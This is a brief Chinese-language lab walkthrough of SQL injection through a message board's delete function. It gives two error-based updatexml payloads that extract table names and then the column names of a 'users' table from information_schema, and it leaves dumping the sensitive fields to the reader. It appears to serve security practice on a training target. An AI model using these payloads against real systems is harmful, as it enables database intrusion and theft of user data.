delete 注入 一般在删除的界面 可能存在
我们看到靶场有一个留言板 点击删除抓个包试试
参数后面解payload 试一试
接着在后面爆表名字
or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)
or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),1,31),0x7e),1)
爆出列的信息
接着爆出敏感字段
剩下的自己爆吧